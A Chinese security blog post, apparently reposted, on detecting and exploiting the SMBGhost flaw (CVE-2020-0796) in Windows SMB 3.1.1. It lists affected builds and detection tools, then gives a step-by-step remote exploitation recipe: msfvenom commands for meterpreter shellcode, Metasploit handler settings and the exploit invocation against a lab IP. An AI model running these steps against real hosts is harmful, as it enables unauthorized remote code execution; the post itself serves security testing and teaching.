码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2020-0796 漏洞检测及利用工具

时间:2020-07-22 02:18:45      阅读:193      评论:0      收藏:0      [点我收藏+]

标签:python3   探测   数据   core   完成   jpg   ima   远程执行   github   

0x01漏洞描述

2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁,目前,远程利用poc代码已公布,本文介绍cve-2020-0796漏洞的检测及利用,来协助大家对未修复的漏洞检测和防御。漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被者利用远程执行任意代码。者利用该漏洞无须权限即可实现远程代码执行,受**的目标系统只需开机在线即可能被***。

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

0x03 漏洞检测

脚本检测
https://github.com/ollypwn/SMBGhost
检测返回的smb的版本,这种检测方式存在一定的误报
技术图片
技术图片

可以发现检测出存在该漏洞
https://github.com/joaozietolie/CVE-2020-0796-Checker
利用nmap脚本检测方式检测
技术图片
技术图片

奇安信检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
技术图片

0X04漏洞利用

本地提权
https://github.com/danigargu/CVE-2020-0796
本地普通权限用户通过exp提权后,成功的获取了系统的system权限
技术图片
远程poc利用
https://github.com/chompie1337/SMBGhost_RCE_PoC
首先下载远程利用poc
技术图片
利用msf生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00‘ -i 1 -f python

技术图片
把buf 替换成USER_PAYLOAD
技术图片
开启msf监听

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.10.183
run

技术图片
运行exp
python3 exploit.py -ip 192.168.10.183
技术图片
可以看到我们返回了一个meterpreter

免责申明:? ??
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、***性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。???????请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试(重要的事情说三遍),如作他用所承受的法律责任一概与东塔安全学院无关!!!

CVE-2020-0796 漏洞检测及利用工具

标签:python3   探测   数据   core   完成   jpg   ima   远程执行   github   

原文地址:https://blog.51cto.com/14872976/2512383

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!